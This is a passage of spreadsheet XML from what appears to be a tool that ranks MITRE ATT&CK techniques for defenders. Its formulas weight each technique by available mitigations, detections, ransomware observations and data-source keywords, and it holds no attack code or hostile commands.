        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.9841269841269844E-2</v>
      </c>
      <c r="AS455" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT455" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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56" spans="1:47">
      <c r="A456" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9523809523809529E-3</v>
      </c>
      <c r="B456" s="25">
        <f>SUM(H456,M456,V456)*(1+SUM(AE456,AG456,AI456,AK456,AM456))</f>
        <v>5.9523809523809527E-2</v>
      </c>
      <c r="C456" s="25" t="s">
        <v>1684</v>
      </c>
      <c r="D456" s="25" t="s">
        <v>1609</v>
      </c>
      <c r="E456" s="25" t="s">
        <v>1685</v>
      </c>
      <c r="F456" s="51">
        <v>0</v>
      </c>
      <c r="G456" s="51">
        <v>1</v>
      </c>
      <c r="H456" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I456">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J456">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K456">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L456">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M456" s="25">
        <v>0</v>
      </c>
      <c r="N456" s="51">
        <v>0</v>
      </c>
      <c r="O456" s="51">
        <v>0</v>
      </c>
      <c r="P456" s="51">
        <v>0</v>
      </c>
      <c r="Q456" s="51">
        <v>2</v>
      </c>
      <c r="R456" s="51"/>
      <c r="S456" s="51">
        <v>0</v>
      </c>
      <c r="T456" s="51"/>
      <c r="U456" s="51">
        <v>0</v>
      </c>
      <c r="V456" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W456">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X456">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y456">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z456">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA456">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB456">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC456" s="29"/>
      <c r="AD456" s="25" t="str" cm="1">
        <f t="array" ref="AD456">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC456)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE456" s="25">
        <f>IF(AD456="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF456" s="25" t="str" cm="1">
        <f t="array" ref="AF456">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC456)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG456" s="25">
        <f>IF(AF456="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH456" s="25" t="str" cm="1">
        <f t="array" ref="AH456">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC456)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI456" s="25">
        <f>IF(AH456="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ456" s="25" t="str" cm="1">
        <f t="array" ref="AJ456">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC456)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK456" s="25">
        <f>IF(AJ456="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL456" s="25" t="str" cm="1">
        <f t="array" ref="AL456">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC456)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM456" s="25">
        <f>IF(AL456="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN456" s="52">
        <v>0</v>
      </c>
      <c r="AO456" s="51">
        <v>0</v>
      </c>
      <c r="AP456" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.9523809523809529E-3</v>
      </c>
      <c r="AQ456" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.9841269841269844E-2</v>
      </c>
      <c r="AR456" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.9841269841269844E-2</v>
      </c>
      <c r="AS456" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT456" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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57" spans="1:47">
      <c r="A457" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11185904761904762</v>
      </c>
      <c r="B457" s="25">
        <f>SUM(H457,M457,V457)*(1+SUM(AE457,AG457,AI457,AK457,AM457))</f>
        <v>0.1185904761904762</v>
      </c>
      <c r="C457" s="25" t="s">
        <v>1686</v>
      </c>
      <c r="D457" s="25" t="s">
        <v>194</v>
      </c>
      <c r="E457" s="25" t="s">
        <v>1687</v>
      </c>
      <c r="F457" s="51">
        <v>1</v>
      </c>
      <c r="G457" s="51">
        <v>1</v>
      </c>
      <c r="H457" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I457">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J457">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K457">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L457">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M457" s="25">
        <v>0</v>
      </c>
      <c r="N457" s="51">
        <v>0</v>
      </c>
      <c r="O457" s="51">
        <v>1</v>
      </c>
      <c r="P457" s="51">
        <v>0</v>
      </c>
      <c r="Q457" s="51">
        <v>0</v>
      </c>
      <c r="R457" s="51"/>
      <c r="S457" s="51">
        <v>0</v>
      </c>
      <c r="T457" s="51"/>
      <c r="U457" s="51">
        <v>0</v>
      </c>
      <c r="V457" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W457">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X457">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y457">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z457">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA457">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB457">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC457" s="29" t="s">
        <v>1067</v>
      </c>
      <c r="AD457" s="25" t="str" cm="1">
        <f t="array" ref="AD457">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC457)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE457" s="25">
        <f>IF(AD457="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF457" s="25" t="str" cm="1">
        <f t="array" ref="AF457">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC457)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG457" s="25">
        <f>IF(AF457="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH457" s="25" t="str" cm="1">
        <f t="array" ref="AH457">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC457)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI457" s="25">
        <f>IF(AH457="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ457" s="25" t="str" cm="1">
        <f t="array" ref="AJ457">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC457)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK457" s="25">
        <f>IF(AJ457="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL457" s="25" t="str" cm="1">
        <f t="array" ref="AL457">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC457)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM457" s="25">
        <f>IF(AL457="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN457" s="60">
        <v>3</v>
      </c>
      <c r="AO457" s="51">
        <v>1</v>
      </c>
      <c r="AP457" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11185904761904762</v>
      </c>
      <c r="AQ457" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.9530158730158735E-2</v>
      </c>
      <c r="AR457" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.9530158730158735E-2</v>
      </c>
      <c r="AS457" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT457" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU45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58" spans="1:47" ht="63.95">
      <c r="A458" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.7266666666666665E-2</v>
      </c>
      <c r="B458" s="25">
        <f>SUM(H458,M458,V458)*(1+SUM(AE458,AG458,AI458,AK458,AM458))</f>
        <v>0.13933333333333334</v>
      </c>
      <c r="C458" s="25" t="s">
        <v>1688</v>
      </c>
      <c r="D458" s="25" t="s">
        <v>414</v>
      </c>
      <c r="E458" s="25" t="s">
        <v>1689</v>
      </c>
      <c r="F458" s="51">
        <v>1</v>
      </c>
      <c r="G458" s="51">
        <v>1</v>
      </c>
      <c r="H458" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I458">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J458">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K458">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L458">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M458" s="25">
        <v>0</v>
      </c>
      <c r="N458" s="51">
        <v>0</v>
      </c>
      <c r="O458" s="51">
        <v>0</v>
      </c>
      <c r="P458" s="51">
        <v>1</v>
      </c>
      <c r="Q458" s="51">
        <v>0</v>
      </c>
      <c r="R458" s="51"/>
      <c r="S458" s="51">
        <v>0</v>
      </c>
      <c r="T458" s="51"/>
      <c r="U458" s="51">
        <v>0</v>
      </c>
      <c r="V458" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W458">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X458">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y458">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z458">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA458">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB458">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC458" s="29" t="s">
        <v>1690</v>
      </c>
      <c r="AD458" s="25" t="str" cm="1">
        <f t="array" ref="AD458">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC458)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE458" s="25">
        <f>IF(AD458="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF458" s="25" t="str" cm="1">
        <f t="array" ref="AF458">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC458)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG458" s="25">
        <f>IF(AF458="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH458" s="25" t="str" cm="1">
        <f t="array" ref="AH458">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC458)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI458" s="25">
        <f>IF(AH458="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ458" s="25" t="str" cm="1">
        <f t="array" ref="AJ458">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC458)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK458" s="25">
        <f>IF(AJ458="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL458" s="25" t="str" cm="1">
        <f t="array" ref="AL458">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC458)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM458" s="25">
        <f>IF(AL458="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN458" s="52">
        <v>1</v>
      </c>
      <c r="AO458" s="51">
        <v>1</v>
      </c>
      <c r="AP458" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.7266666666666665E-2</v>
      </c>
      <c r="AQ458" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.6444444444444448E-2</v>
      </c>
      <c r="AR458" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.6444444444444448E-2</v>
      </c>
      <c r="AS458" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT458" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU45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59" spans="1:47" ht="32.1">
      <c r="A459" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.5883809523809521E-2</v>
      </c>
      <c r="B459" s="25">
        <f>SUM(H459,M459,V459)*(1+SUM(AE459,AG459,AI459,AK459,AM459))</f>
        <v>0.1255047619047619</v>
      </c>
      <c r="C459" s="25" t="s">
        <v>1691</v>
      </c>
      <c r="D459" s="25" t="s">
        <v>205</v>
      </c>
      <c r="E459" s="25" t="s">
        <v>1692</v>
      </c>
      <c r="F459" s="51">
        <v>1</v>
      </c>
      <c r="G459" s="51">
        <v>1</v>
      </c>
      <c r="H459" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I459">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J459">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K459">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L459">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M459" s="25">
        <v>0</v>
      </c>
      <c r="N459" s="51">
        <v>0</v>
      </c>
      <c r="O459" s="51">
        <v>1</v>
      </c>
      <c r="P459" s="51">
        <v>0</v>
      </c>
      <c r="Q459" s="51">
        <v>0</v>
      </c>
      <c r="R459" s="51"/>
      <c r="S459" s="51">
        <v>0</v>
      </c>
      <c r="T459" s="51"/>
      <c r="U459" s="51">
        <v>0</v>
      </c>
      <c r="V459" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W459">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X459">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y459">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z459">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA459">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB459">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC459" s="29" t="s">
        <v>92</v>
      </c>
      <c r="AD459" s="25" t="str" cm="1">
        <f t="array" ref="AD459">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC459)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE459" s="25">
        <f>IF(AD459="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF459" s="25" t="str" cm="1">
        <f t="array" ref="AF459">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC459)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG459" s="25">
        <f>IF(AF459="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH459" s="25" t="str" cm="1">
        <f t="array" ref="AH459">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC459)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI459" s="25">
        <f>IF(AH459="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ459" s="25" t="str" cm="1">
        <f t="array" ref="AJ459">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC459)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK459" s="25">
        <f>IF(AJ459="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL459" s="25" t="str" cm="1">
        <f t="array" ref="AL459">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC459)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM459" s="25">
        <f>IF(AL459="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN459" s="58">
        <v>1</v>
      </c>
      <c r="AO459" s="51">
        <v>1</v>
      </c>
      <c r="AP459" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.5883809523809521E-2</v>
      </c>
      <c r="AQ459" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.1834920634920635E-2</v>
      </c>
      <c r="AR459" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.1834920634920635E-2</v>
      </c>
      <c r="AS459" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT459" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU45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60" spans="1:47" ht="48">
      <c r="A460" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3933333333333334E-2</v>
      </c>
      <c r="B460" s="25">
        <f>SUM(H460,M460,V460)*(1+SUM(AE460,AG460,AI460,AK460,AM460))</f>
        <v>0.13933333333333334</v>
      </c>
      <c r="C460" s="25" t="s">
        <v>1693</v>
      </c>
      <c r="D460" s="25" t="s">
        <v>208</v>
      </c>
      <c r="E460" s="25" t="s">
        <v>1694</v>
      </c>
      <c r="F460" s="51">
        <v>1</v>
      </c>
      <c r="G460" s="51">
        <v>1</v>
      </c>
      <c r="H460" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I460">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J460">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K460">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L460">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M460" s="25">
